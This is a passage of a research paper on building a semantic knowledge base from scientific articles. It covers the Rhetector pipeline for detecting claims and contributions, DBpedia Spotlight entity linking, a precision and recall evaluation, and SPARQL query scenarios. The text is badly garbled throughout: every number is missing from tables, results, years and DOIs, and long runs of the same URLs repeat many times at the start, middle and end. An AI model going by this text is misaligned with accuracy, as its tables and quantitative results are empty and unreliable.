http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://dx.doi.org/ . /peerj-cs. table quantitative analysis of the populated knowledge base. we processed three corpora for res and nes. the columns ‘distinct uris’ and ‘distinct dbpediane/re’ count each uri only once throughout the kb, hence the total is not the sum of the individual corpora, as some uris appear across them. size dbpedia named entities rhetorical entities distinct dbpediane/re corpus id docs sents occurrences distinct uris claims contributions claims contributions az , , , peerjcompsci , , , sepublica , , , total , , , , spotlight annotation process taking up around % of the processing time (running on a standard quad-core desktop pc). for each corpus, we ran a number of queries on the knowledge base to count the occur- rences of nes and res in the contained documents. the ‘dbpedia named entities (occur- rences)’ column shows the total number of nes tagged by spotlight, whereas the ‘dbpedia named entities (distinct uris)’ column shows the total of named entities with a unique uri. for example, if we have both “linked open data” and “lod” tagged in a document, the total occurrence would be two, but since they are both grounded to the same uri (i.e., <dbpedia:linked data>), the total distinct number of nes is one. this is particularly interesting in relation to their distribution within the documents’ rhetorical zones (column ‘distinct dbpedia ne/re’). as can be seen in table , the number of nes within res are an order of a magnitude smaller than the total number of distinct named entities throughout the whole papers. this holds across the three distinct corpora we evaluated. this experiment shows that nes are not evenly distributed in scientific literature. overall, this is encouraging for our hypothesis that the combination of nes with res brings added value, compared to either technique alone: as mentioned in the example above, a paper could mention a topic, such as “linked data,” but only as part of its motivation, literature review, or future work. in this case, while the topic appears in the document, the paper does not actually contain a contribution involving linked data. relying on standard information retrieval techniques hence results in a large amount of noise when searching for literature with a particular contribution. semantic queries on the other hand, as we propose them here, can easily identify relevant papers in a knowledge base, as we will show in the ‘application’ section below. text mining pipeline evaluation we assessed the performance of our text mining pipeline by conducting an intrinsic evaluation i.e., comparing its precision and recall with respect to a gold standard corpus. gold standard corpus development and evaluation metrics in an intrinsic evaluation scenario, the output of an nlp pipeline is directly compared with a gold standard (also known as the ground truth) to assess its performance in a task. towards this end, we manually curated a gold standard corpus of documents, where papers were randomly selected from each of the three datasets described in the ‘evaluation’ section. sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table statistics of our gold standard corpus. we manually annotated documents from different sources with claim and contribution entities. the ‘sentences’ and ’tokens’ column shows the total number of sentences and tokens for each corpus. the ‘annotated rhetorical entities’ column shows the number of annotations manually created by the authors in the corpus. size annotated rhetorical entities corpus id documents sentences tokens claims contributions az , , peerjcompsci , , sepublica , , total , , these documents were then annotated by the first author in the gate developer graphical user interface (cunningham et al., ). each sentence containing a rhetorical entity was manually annotated and classified as either a claim or contribution by adding the respective class uri from the sro ontology as the annotation feature. the annotated sepublica papers were used during system development, whereas the annotated az and peerjcompsci documents were strictly used for testing only. table shows the statistics of our gold standard corpus. note that both the az and peerjcompsci gold standard documents are available with our supplements in full-text stand-off xml format, whereas for the sepublica corpus we currently can only include our annotations, as their license does not permit redistribution. for the evaluation, we ran our rhetector pipeline on the evaluation corpus and computed the metrics precision (p), recall (r) and their f-measure (f- . ), using gate’s corpus qa tool (cunningham et al., ). for each metric, we calculated the micro and macro average: in micro averaging, the evaluation corpus (composed of our three datasets) is treated as one large document, whereas in macro averaging, p, r and f are calculated on a per document basis, and then an average is computed (cunningham et al., ). intrinsic evaluation results and discussion table shows the results of our evaluation. on average, the rhetector pipeline obtained a . f-measure on the evaluation dataset. we gained some additional insights into the performance of rhetector. when comparing the az and sepublica corpora, we can see that the pipeline achieved almost the same f-measure for roughly the same amount of text, although the two datasets are from different disciplines: sepublica documents are semantic web-related workshop papers, whereas the az corpus contains conference articles in computational linguistics. another interesting observation is the robustness of rhetector’s performance when the size of an input document (i.e., its number of tokens) increases. for example, when comparing the az and peerjcompsci performance, we observed only a . difference in the pipeline’s (micro) f-measure, even though the total number of tokens to process was doubled ( , vs. , tokens, respectively). sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table results of the intrinsic evaluation of rhetector. we assessed the precision, recall and f-measure of our pipeline against a gold standard corpora. the ‘detected rhetorical entities’ column shows the number of annotations generated by rhetector. detected rhetorical entities precision recall f- . corpus id claims contributions micro macro micro macro micro macro az . . . . . . peerjcompsci . . . . . . sepublica . . . . . . total . . . . . . an error analysis of the intrinsic evaluation results showed that the recall of our pipeline suffers when: (i) the authors’ contribution is described in passive voice and the pipeline could not attribute it to the authors, (ii) the authors used unconventional metadiscourse elements; (iii) the rhetorical entity was contained in an embedded sentence; and (iv) the sentence splitter could not find the correct sentence boundary, hence the re span covered more than one sentence. accuracy of ne grounding with spotlight to evaluate the accuracy of ne linking to the lod, we randomly chose – entities per document from the sepublica corpus and manually evaluated whether they are connected to their correct sense in the dbpedia knowledge base, by inspecting their uris through a web browser. out of the entities manually inspected, of the entities had their correct semantics in the dbpedia knowledge base. overall, this results in % accuracy, which confirms our hypothesis that lod knowledge bases are useful for the semantic description of entities in scientific documents. our error analysis of the detected named entities showed that spotlight was often unable to resolve entities to their correct resource (sense) in the dbpedia knowledge base. spotlight was also frequently unable to resolve acronyms to their full names. for example, spotlight detected the correct sense for the term “information extraction,” while the term “(ie)” appearing right next to it was resolved to “internet explorer” instead. by design, this is exactly how the spotlight disambiguation mechanism works: popular terms have higher chances to be connected to their surface forms. we inspected their corresponding articles on wikipedia and discovered that the wikipedia article on internet explorer is significantly longer than the information extraction wiki page and has times more inline links, which shows its prominence in the dbpedia knowledge base, at the time of writing. consequently, this shows that tools like spotlight that have been trained on the general domain or news articles are biased towards topics that are more popular, which is not necessarily the best strategy for scientific publications. application we published the populated knowledge base described in the previous section using the jena fuseki . server that provides a restful endpoint for sparql queries. we now jena fuseki, http://jena.apache.org/ documentation/serving data/ sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://dx.doi.org/ . /peerj-cs. table three example contributions from papers obtained through a sparql query. the rows of the table show the paper id and the contribution sentence extracted from the user’s corpus. paper id contribution sepublica /paper- .xml “this position paper discusses how research publication would benefit of an infrastructure for evaluation entities that could be used to support documenting research efforts (e.g., in papers or blogs), analysing these efforts, and building upon them.” sepublica /paper- .xml “in this paper, we describe our attempts to take a commodity publication environment, and modify it to bring in some of the formality required from academic publishing.” sepublica /paper- .xml “we address the problem of identifying relations between semantic annotations and their relevance for the connectivity between related manuscripts.” show how the extracted knowledge can be exploited to support a user in her tasks. as a running example, let us imagine a use case: a user wants to write a literature review from a given set of documents about a specific topic. scenario . a user obtained the sepublica proceedings from the web. before reading each article thoroughly, she would like to obtain a summary of the contributions of all articles, so she can decide which articles are relevant to her task. ordinarily, our user would have to read all of the retrieved documents in order to evaluate their relevance—a cumbersome and time-consuming task. however, using our approach the user can directly query for the rhetorical type that she needs from the system (note: the prefixes used in the queries in this section can be resolved using table ): select ?paper ?content where { ?paper pubo:hasannotation ?rhetoricalentity . ?rhetoricalentity rdf:type sro:contribution . ?rhetoricalentity cnt:chars ?content } order by ?paper the system will then show the query’s results in a suitable format, like the one shown in table , which dramatically reduces the amount of information that the user is exposed to, compared to a manual triage approach. retrieving document sentences by their rhetorical type still returns res that may concern entities that are irrelevant or less interesting for our user in her literature review task. ideally, the system should return only those res that mention user-specified topics. since we model both the res and nes that appear within their boundaries, the system can allow the user to further stipulate her request. consider the following scenario: scenario . from the set of downloaded articles, the user would like to find only those articles that have a contribution mentioning ‘linked data’. sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table two example contributions about ‘linked data’. the results shown in the table are contribu- tion sentences that contain an entity described by <dbpedia:linked data>. paper id contribution sepublica /paper- .xml “we present two real-life use cases in the fields of chemistry and biology and outline a general methodology for transforming research data into linked data.” sepublica /paper- .xml “in this paper we present a vision for having such data available as linked open data (lod), and we argue that this is only possible and for the mutual benefit in cooperation between researchers and publishers.” similar to scenario , the system will answer the user’s request by executing the following query against its knowledge base: select distinct ?paper ?content where { ?paper pubo:hasannotation ?rhetoricalentity . ?rhetoricalentity rdf:type sro:contribution . ?rhetoricalentity pubo:containsne ?ne. ?ne rdfs:isdefinedby dbpedia:linked data . ?rhetoricalentity cnt:chars ?content } order by ?paper the results returned by the system, partially shown in table , are especially interesting. the query not only retrieved parts of articles that the user would be interested in reading, but it also inferred that “linked open data,” “linked data” and “lod” named entities have the same semantics, since the dbpedia knowledge base declares an <owl:sameas> relationship between the aforementioned entities: a full-text search on the papers, on the other hand, would not have found such a semantic relation between the entities. so far, we showed how we can make use of the lod-linked entities to retrieve articles of interest for a user. note that this query returns only those articles with res that contain an ne with a uri exactly matching that of dbpedia:linked data. however, by virtue of traversing the lod cloud using an ne’s uri, we can expand the query to ask for contributions that involve dbpedia:linked data or any of its related subjects. in our experiment, we interpret relatedness as being under the same category in the dbpedia knowledge base (see fig. ). consider the scenario below: scenario . the user would like to find only those articles that have a contribution mention- ing topics related to ‘linked data’. the system can respond to the user’s request in three steps: (i) first, through a federated query to the dbpedia knowledge base, we find the category that dbpedia:linked data has been assigned to—in this case, the dbpedia knowledge base returns “semantic web,” “data management,” and “world wide web” as the categories; (ii) then, we retrieve all other subjects which are under the same identified categories (cf. fig. ); (iii) finally, for each related entity, we look for rhetorical entities in the knowledge base that mention the sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure finding semantically related entities in the dbpedia ontology: the linked data and con- trolled vocabulary entities in the dbpedia knowledge base are assumed to be semantically related to each other, since they are both contained under the same category, i.e., semantic web. related named entities within their boundaries. the semantically expanded query is shown below: select ?paper ?content where { service <http://dbpedia.org/sparql> { dbpedia:linked data <http://purl.org/dc/terms/subject> ?category . ?subject <http://purl.org/dc/terms/subject> ?category . } ?paper pubo:hasannotation ?rhetoricalentity . ?rhetoricalentity rdf:type sro:contribution . ?rhetoricalentity pubo:containsne ?ne. ?ne rdfs:isdefinedby ?subject . ?rhetoricalentity cnt:chars ?content } order by ?paper the system will return the results, shown in table , to the user. this way, the user receives more results from the knowledge base that cover a wider range of topics semantically related to linked data, without having to explicitly define their semantic relatedness to the system. this simple example is a demonstration of how we can exploit the wealth of knowledge available in the lod cloud. of course, numerous other queries now become possible on scientific papers, by exploiting other linked open data sources. sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table the results from the extended query that show contribution sentences that mention a named entity semantically related to <dbpedia:linked data>. paper id contribution sepublica /paper- .xml “in this paper, we propose a model to specify workflow-centric research objects, and show how the model can be grounded using semantic technologies and existing vocabularies, in particular the object reuse and exchange (ore) model and the annotation ontology (ao).” sepublica /paper- .xml “in this paper we present a vision for having such data available as linked open data (lod), and we argue that this is only possible and for the mutual benefit in cooperation between researchers and publishers.” sepublica /paper- .xml “in this paper we present two ontologies, i.e., biro and c o, that allow users to describe bibliographic references in an accurate way, and we introduce renhancer, a proof-of-concept implementation of a converter that takes as input a raw-text list of references and produces an rdf dataset according to the biro and c o ontologies.” sepublica /paper- .xml “we propose to use the cito ontology for describing the rhetoric of the citations (in this way we can establish a network with other works).” conclusion we all need better ways to manage the overwhelming amount of scientific literature available to us. our approach is to create a semantic knowledge base that can supplement existing repositories, allowing users fine-grained access to documents based on querying lod entities and their occurrence in rhetorical zones. we argue that by combining the concepts of res and nes, enhanced retrieval of documents becomes possible, e.g., finding all contributions on a specific topic or comparing the similarity of papers based on their res. to demonstrate the feasibility of these ideas, we developed an nlp pipeline to fully automate the transformation of scientific documents from free-form content, read in isolation, into a queryable, semantic knowledge base. in future work, we plan to further improve both the nlp analysis and the lod linking part of our approach. as our experiments showed, general-domain ne linking tools, like dbpedia spotlight, are biased toward popular terms, rather than scientific entities. here, we plan to investigate how we can adapt existing or develop new entity linking methods specifically for scientific literature. finally, to support end users not familiar with semantic query languages, we plan to explore user interfaces and interaction patterns, e.g., based on our zeeva semantic wiki (sateli & witte, ) system. additional information and declarations funding this work was partially funded by an nserc discovery grant. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: nserc discovery grant. competing interests the authors declare there are no competing interests. author contributions • bahar sateli and rené witte conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: http://www.semanticsoftware.info/semantic-scientific-literature-peerj- - supplements. references berners-lee t, hendler j. . publishing on the semantic web. nature ( ): – doi . / . blake c. . beyond genes, proteins, and abstracts: identifying scientific claims from full-text biomedical articles. journal of biomedical informatics ( ): – doi . /j.jbi. . . . bontcheva k, kieniewicz j, andrews s, wallis m. . semantic enrichment and search: a case study on environmental science literature. d-lib magazine ( ): doi . /january - bontcheva. constantin a, peroni s, pettifer s, david s, vitali f. . the document components ontology (doco). the semantic web journal in press. available at http://www.semantic-web-journal.net/ system/files/swj .pdf. cunningham h, maynard d, bontcheva k, tablan v. . gate: a framework and graphical development environment for robust nlp tools and applications. in: proceedings of the th anniversary meeting of the association for computational linguistics (acl’ ). cunningham h, maynard d, bontcheva k, tablan v, aswani n, roberts i, gorrell g, funk a, roberts a, damljanovic d, heitz t, greenwood ma, saggion h, petrak j, li y, peters w. . text processing with gate (version ). sheffield: gate. daiber j, jakob m, hokamp c, mendes pn. . improving efficiency and accuracy in multilingual entity extraction. in: proceedings of the th international conference on semantic systems (i-semantics). available at http://jodaiber.github.io/doc/entity.pdf. di iorio a, peroni s, vitali f. . towards markup support for full goddags and beyond: the earmark approach. in: proceedings of balisage: the markup conference. available at http:// www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html. groza t, handschuh s, möller k, decker s. a. salt—semantically annotated latex for scientific publications. in: the semantic web: research and applications, lncs. berlin, heidelberg: springer, – . sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://dx.doi.org/ . / http://dx.doi.org/ . /j.jbi. . . http://dx.doi.org/ . /january -bontcheva http://dx.doi.org/ . /january -bontcheva http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://www.semantic-web-journal.net/system/files/swj _ .pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol 